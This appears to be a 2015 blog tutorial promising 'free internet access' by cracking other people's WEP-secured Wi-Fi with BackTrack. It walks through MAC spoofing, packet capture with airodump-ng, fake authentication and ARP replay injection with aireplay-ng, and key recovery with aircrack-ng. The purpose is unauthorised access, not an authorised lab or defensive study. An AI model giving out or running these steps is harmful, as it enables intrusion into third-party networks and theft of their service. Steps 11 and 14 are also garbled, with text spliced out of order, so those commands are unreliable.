Monday 26 January 2015

Wi-Fi Network Hacking Free Internet access




This tutorial will explain that how to crack wep key using Backtrack..!!




Step 1:-First Download Backtrack  from the following link:http://www.remote-exploit.org/backtrack_download.htmlStep 2:-Burn the iso image on CD and boot your laptop from CD driveStep 3:-Select the third boot option(VESA/KDE).Step 4:-Once in BT3, click the tiny black box in the lower left corner to load up a  "Konsole" window.Step 5:-Type the following commandairmon-ngNote down the interface name. In this example wifi0Step 6:-airmon-ng stop wifi0Step 7:-ifconfig wifi0 downStep 8:-macchanger --mac 00:11:22:33:44:66 wifi0Step 9:-airmon-ng start wifi0Step 10:-airodump-ng wifi0This will start populating Wifi networks. Press Ctrl + C to stop.Check the network with WEP encryption.Notedown BSSID, CH and ESSID somewhere in notepad or paperNote that if the same BSSID is available in the second part with STATION associated with it,means you some one is accessing that network and our task will be little easier. If not than don�t worry we will still crack it.Step 11:-airodump-ng -c (channel) -w (file name)Replace(channel) with the CH which u had already n(file name) with any name of your choice(bssid) with the BSSID which u had already note--bssid (bssid) wifi0Note itLeave this console as it is and start new konsoleStep 12:-aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:66 wifi0If you don�t get Association Successful mesage then keep on trying untilyou got success.Step 13:-aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:66 wifi0Well if you don�t see ARP ACK and sent packets are not increasing or still 0 than it means no 1 isaccessing that network.But don�t worry you go an optional step,Leave this console as it is and start new kStep 14:-aireplay-ng -2 �p 0841 �c FF:FF:FF:FF:FF:FFkonsolemessage than keep on trying until you get successgot an optional stepkonsole�b (bssid) �h 00:11:22:33:44:66 wfi0Press y and enterNow you will see that ARP and ACK packets in 2nd console are increasing fastKeep this console as it is and start 4th console.Step 15:-aircrack-ng -b (bssid) (filename)-Just wait and watch�..Backtrack will do rest of the work.Hurray we got the key.Done..!!


No comments:

Post a Comment